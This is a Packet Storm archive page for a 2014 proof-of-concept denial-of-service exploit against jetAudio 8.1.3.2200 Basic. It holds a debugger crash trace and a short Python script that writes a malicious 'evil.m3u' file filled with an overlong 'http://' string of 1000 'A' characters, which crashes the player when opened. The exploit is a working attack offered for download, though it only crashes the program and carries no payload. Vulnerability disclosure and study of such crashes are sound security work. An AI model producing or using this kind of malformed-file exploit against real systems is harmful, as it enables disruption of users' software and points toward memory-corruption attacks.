exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

jetAudio 8.1.3.2200 Crash Proof Of Concept

jetAudio 8.1.3.2200 Crash Proof Of Concept
Posted Dec 27, 2014
Authored by Hadji Samir

jetAudio version 8.1.3.2200 proof of concept denial of service vulnerability that creates a malicious .m3u file.

tags | exploit, denial of service, proof of concept
SHA-256 | 81d3a76d227c83a9d519e13529b1fc234cf286bc3316c0bb9e787288d776ba6a

jetAudio 8.1.3.2200 Crash Proof Of Concept

Change Mirror Download
# Exploit Title         : jetAudio 8.1.3.2200 Basic (m3u) Crash POC
# Product : jetAudio Basic
# Date : 27.12.2014
# Exploit Author : Hadji Samir s-dz@hotmail.fr
# Software Link : http://www.jetaudio.com/download/
# Vulnerable version : 8.1.3.2200 Basic
# Vendor Homepage : http://www.jetaudio.com/
# Tested on : Windows 7 x86 fr
#============================================================================================
# Open created POC file (evil.m3u) with jetAudio
# Details
# ((2bb0.2a60): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=0012fb0c edx=76ed64f4 esi=fffffffe edi=00000000
# eip=76f2e60e esp=0012fb28 ebp=0012fb54 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# ntdll!LdrVerifyImageMatchesChecksum+0x633:
# 76f2e60e cc int 3
#
# 0:000> kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 0012fb54 76f0e2d1 7ffdf000 7ffd5000 76f6714c ntdll!LdrVerifyImageMatchesChecksum+0x633
# 0012fcb0 76ef8fc0 0012fd24 76e90000 7346e5a2 ntdll!RtlTimeToElapsedTimeFields+0x4e3d
# 0012fd00 76eeb2c5 0012fd24 76e90000 00000000 ntdll!vsnwprintf+0x3eb
# 0012fd10 00000000 0012fd24 76e90000 00000000 ntdll!LdrInitializeThunk+0x10
#============================================================================================
#!/usr/bin/python

from struct import pack
m3u = ("http://%s")
buf = "\x41" * 1000
m3u %= buf
fd = open("evil.m3u", "w")
fd.write(m3u)
fd.close()
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    0 Files
  • 3
    May 3rd
    0 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close